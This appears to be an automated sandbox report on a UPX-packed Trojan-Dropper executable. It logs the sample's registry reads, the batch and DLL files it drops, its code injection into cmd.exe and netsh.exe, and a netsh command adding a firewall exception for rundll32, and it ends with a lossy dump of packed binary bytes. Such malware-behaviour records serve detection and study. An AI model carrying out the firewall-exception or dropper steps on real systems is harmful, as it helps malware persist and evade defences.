SHA-1: 2e2fefee6c425014c14996adec7b9393bfe85e25 
File Size: 18432 Bytes
Command Line: C:\WINDOWS\tt_1211198012.exe 
Process-status at analysis end: alive 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​MSVCRT.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​GDI32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 

  - Run-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​Apphelp.dll  0x77B40000  0x00022000 
C:\​WINDOWS\​system32\​shlwapi.dll  0x77F60000  0x00076000 

  - SigBuster Output  
UPX All_Versions SN:1634

  - Ikarus Virus Scanner  
Trojan-Dropper (Sig-Id:26843452)

7.a) tt_1211198012.exe - Registry Activities

  - Registry Values Read:  
Key Name Value Times
HKLM\​SYSTEM\​WPA\​MediaCenter  Installed 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  AuthenticodeEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  DefaultLevel  262144 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  PolicyScope 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  TransparentEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemData  0x5eab304f957a49896a006c1c31154015 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemSize  779 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemData  0x67b0d48b343a3fd3bce9dc646704f394 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemSize  517 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemData  0x327802dcfef8c893dc8ab006dd847d1d 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemSize  918 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemData  0xbd9a2adb42ebd8560e250e4df8162f67 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemSize  229 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemData  0x386b085f84ecf669d36b956a22c01e80 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemSize  370 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  ItemData  %HKEY_CURRENT_USER\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders\​Cache%OLK* 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  SaferFlags 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  AppData  C:\​Documents and Settings\​user\​Application Data 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cache  C:\​Documents and Settings\​user\​Local Settings\​Temporary Internet Files 

7.b) tt_1211198012.exe - File Activities

  - Files Created:  
c:\dll32.bat

  - Files Modified:  
c:\dll32.batinfo

  - Memory Mapped Files:  
File Name
C:\WINDOWS\system32\Apphelp.dll
C:\WINDOWS\system32\cmd.exe
C:\Windows\AppPatch\sysmain.sdb
c:\dll32.bat

7.c) tt_1211198012.exe - Process Activities

  - Processes Created:  
Executable Command Line
C:\WINDOWS\system32\cmd.exe   

  - Remote Threads Created:  
Affected Process
C:\WINDOWS\system32\cmd.exe

  - Foreign Memory Regions Read:  
Process: C:\WINDOWS\system32\cmd.exe

  - Foreign Memory Regions Written:  
Process: C:\WINDOWS\system32\cmd.exe

8. cmd.exe

  - General information about this executable  
Analysis Reason: Started by tt_1211198012.exe 
Filename: cmd.exe 
MD5: 6d778e0f95447e6546553eeea709d03c 
SHA-1: 811a005cf787c6ccbe0d9f1c36c1d49a9cb71fd1 
File Size: 389120 Bytes
Command Line: cmd /c c:\dll32.bat 
Process-status at analysis end: alive 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​msvcrt.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​GDI32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 

  - Run-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​Apphelp.dll  0x77B40000  0x00022000 
C:\​WINDOWS\​system32\​VERSION.dll  0x77C00000  0x00008000 

8.a) cmd.exe - Registry Activities

  - Registry Values Read:  
Key Name Value Times
HKLM\​SYSTEM\​WPA\​MediaCenter  Installed 
HKLM\​Software\​Microsoft\​Command Processor  AutoRun   
HKLM\​Software\​Microsoft\​Command Processor  CompletionChar  64 
HKLM\​Software\​Microsoft\​Command Processor  DefaultColor 
HKLM\​Software\​Microsoft\​Command Processor  EnableExtensions 
HKLM\​Software\​Microsoft\​Command Processor  PathCompletionChar  64 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  AuthenticodeEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  DefaultLevel  262144 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  PolicyScope 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  TransparentEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemData  0x5eab304f957a49896a006c1c31154015 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemSize  779 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemData  0x67b0d48b343a3fd3bce9dc646704f394 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemSize  517 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemData  0x327802dcfef8c893dc8ab006dd847d1d 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemSize  918 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemData  0xbd9a2adb42ebd8560e250e4df8162f67 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemSize  229 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemData  0x386b085f84ecf669d36b956a22c01e80 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemSize  370 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  ItemData  %HKEY_CURRENT_USER\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders\​Cache%OLK* 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  SaferFlags 
HKLM\​System\​CurrentControlSet\​Control\​Nls\​Language Groups 
HKLM\​System\​CurrentControlSet\​Control\​Nls\​Locale  00000409 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Command Processor  CompletionChar 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Command Processor  DefaultColor 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Command Processor  EnableExtensions 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cache  C:\​Documents and Settings\​user\​Local Settings\​Temporary Internet Files 

8.b) cmd.exe - File Activities

  - Files Created:  
C:\WINDOWS\system32\dll32.dll

  - Files Read:  
c:\dll32.bat

  - Memory Mapped Files:  
File Name
C:\WINDOWS\system32\Apphelp.dll
C:\WINDOWS\system32\netsh.exe
C:\WINDOWS\tt_1211198012.exe
C:\Windows\AppPatch\sysmain.sdb
c:\dll32.bat

8.c) cmd.exe - Process Activities

  - Processes Created:  
Executable Command Line
C:\WINDOWS\tt_1211198012.exe   
C:\WINDOWS\tt_1211198012.exe  "C:\WINDOWS\tt_1211198012.exe" /1  
C:\WINDOWS\system32\netsh.exe   
C:\WINDOWS\system32\netsh.exe  netsh add allowedprogram "C:\WINDOWS\System32\rundll32.exe" dll32 ENABLE 

  - Remote Threads Created:  
Affected Process
C:\WINDOWS\tt_1211198012.exe
C:\WINDOWS\system32\netsh.exe

  - Foreign Memory Regions Read:  
Process: C:\WINDOWS\system32\netsh.exe
Process: C:\WINDOWS\tt_1211198012.exe

  - Foreign Memory Regions Written:  
Process: C:\WINDOWS\system32\netsh.exe
Process: C:\WINDOWS\tt_1211198012.exe

9. tt_1211198012.exe

  - General information about this executable  
Analysis Reason: Started by cmd.exe 
Filename: tt_1211198012.exe 
MD5: ee8d222943c128e8cedf010c0cb03d88 
SHA-1: 2e2fefee6c425014c14996adec7b9393bfe85e25 
File Size: 18432 Bytes
Command Line: "C:\WINDOWS\tt_1211198012.exe" /1  
Process-status at analysis end: dead 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​MSVCRT.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​GDI32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 

  - SigBuster Output  
UPX All_Versions SN:1634

  - Ikarus Virus Scanner  
Trojan-Dropper (Sig-Id:26843452)

  - Program output  
Stdout: 
MZ......................@.............................................	.!..L.!This program cannot be run in DOS mode.

$.........T...:...:...:...6...:...>...:...:...:.(.4...:.C.0...:.C.>...:...)...:...;...:...)...:...1...:.T.>...:.Rich..:.................PE..L....H.I...........!.....0.......p.. ...............................................................................$...@.......$...........................d.......................................................................................UPX0.....p..............................UPX1.....0..........................@...UPX2.................2..............@..............................................................................................................................................................................................................................................................................................................................................................................3.02.UPX!
	.
0....4..Q....*...b..I..:.w............_H	.h..... .2nY..&.4......QV...u..N8.E..,./.j...... .....@T.e.........M....
.M.^d.
.?..:...X.Q.E.VW]3....._.W..-.GW.}........ Wm.e_..U.F8.~<.@D.._d.o..U....dS3.9].t%..`(;.t.P<..c?.Y.u.	.Y.....9...w.
V....W.P(.Q......E..7	.=.....P....{42.5E..u....C..50|..".@~.......0#,.t.P...4.S...]x.s.=.mu%..U....r	
....7w.l.	P..^[...........s.B,.VuV...R..k.|.....d....F#..l...
....;;sg#P..(.,sX...,..........M2.....^...fl..e|.0K....,(V...k4..}..
...~ {.2.q%0j.~....0QS?}....3........].3...I+...x...?.......>[.sV.F....;.~.1_P..!..L]...W.HSE.V;.W....no.TOM...x....yx..W.S.v..D~...;}{....}.=j.+......j."`...>.8l]....3<Wj.Y\.}...7......].@....P.4.bO..~..<Qo..g......6...E.....lL.x.. ....1...-....J.k.S...\AqY..5u.W..f..t...f.]..].f....
.....
.... .....0.X
..VV..-4.E..F.&j+....n....PVsP_t.......Y.Jt...	.....8......>l..V8.Wt89.t+.......w..QR..4......K9.u.2.j7....R.).Y'Yu.(m..........<t$.D|a.{..Vh.W....Q...&.{X.O.<.A...< c.H...\|2.....h.............5
qik!....h...*|..>.M..0.7i..}[.o....>.n...{j ......Ytjg...GP0/.......tT.+..~.W........;...F.VT...w.S.....0.hc ..t..8.N^S..`S3...\......
t.@...\.0{......X...B...$..[... 
.0.AD....g?.).X......H.}t'`_.i....]..[w$.).#..I.Q<.hg2L..]@..~.d?.S@WA..f.XSx._x......^(.#...1...._.+............P..S.h.D<.lO...6.SP..'.t.........`....L..-u.7hV....+M.....~.U.JR......RG..*.
...RA{.uV..`............V.l't	...C0.....B4{....F.R,|f$.u.........M}..t........h.F.F..*..0......W[:...@..^..S..g.@...S'......I4_....8........W.*.f....K...e.
-G.W
 t_.6./...FQ6.......$....V....P..^:W....k.|..Du.9.t.....S......e....=rF......T..-Wk5:W.^...	..Ptt&..:.^.6f.V.DC...YY..v...A.._p+_h;.t9UI..<|t1.SPu.m.$AR.H...h.v.9.)u....0.M
`0.*......./H.PQ...=.....MS..#.hl.j........?...U..`8u....{s[..;...W....RWn.{WbM#YP..5)$.......&.S.P$L..5&.#R..(..".......Sk..X....VR}..'...@.<S...k.\.i.M6...b..tM;.~v*L$.=[1QPRL..
.OL...u....&.8^....#..:<.....<.....?.......AN..<..I...$C`....#p.....g......*+11fS..T..6M...z.V#F=t......j?...Y.....%.ukIkh!..fh..m.~,.........
.0..Xa....I.......yW..n...t.,.l...7.Y~...E..U.........%X.ka.d...x..)....p#.K..l`'...!\ .,.k._.%.t.b..E\.\.|ZXTD.5.\ .....m#.U/...n_r_.....~qW[../.CN<.....<\ .;..+u...=.|.../8/<G..|.'......'r...+)....LI..~......2..u.3..n.5c........_8hu....J0jd3.Y..;..sB..%.M.Q.t0..Y..~,Q.4O...6......G..S......;9...A....:..t..._.q...._..s}..][..,..].j.P...hs.....aa...b.>.h.h.....1...X....$.k.aa.P...].Y....E.].S..w.
.l.......V..#t.;.s......E.P...........F.|_2.....lIc.c.LFS..PIFNn...................+.s..........,....M.E.<.< .F.?.........~..._..<
]<
u.N..F..u.lt.	1..+...|.....Ju8....g.....5d..+$..M.+. 7?.....%+U....U...^.l.B...9*|`.|..6N .......x.
......e1h$w&b.....I.@V....H..q...
...o...t.a.j"V.........j.dYa...e.....tl.6..9......,t..u.:...Q.=.0...V.......P_-|].J...!.8..o..tV.
...H+...u2R).kP.]._..M.X+#c....U.otB..@.%..2....7	.0.!H.u.w........A.....|.........<...|x ...-.v}.8......#]....<-........M....PV
...	..h...d.f.Fs*
..[[.A.&_ ......|...........!..K,....=..\=T.h............V...4..V...3....F.k.....U.....~..[.t%.s.- ..Z.%...V/XnYm.8.;:jm.2.y.2....#..5..l2.I...%wY..:......f3)../.m.C~....G.....&O.OG}.++....20.u..d9Y.-...._.A...%-.8k. ..0..Y'.]../.....Q................j...e.H> ..n...E......2.=..W...t[.+...Q..oYP.E..NP.km..Q...T..fm...	Z..07.j.V+......WhB@...+..........u	.!-...@ PFb.r.........M..|..M.=..P.....<...xpld`e8.\X...$V.<2f..	.H...Z1!)........;.]V.d..[..._..=L.rVz...A..<.......p.....P .....;.L..v.2...j.......&f.').....l).	- .;"......@!Sl.]......u
&.2.Q.4G..}..o.^e....P..s..H..<..
.KX...5..2...
....W...p..&..E2.a......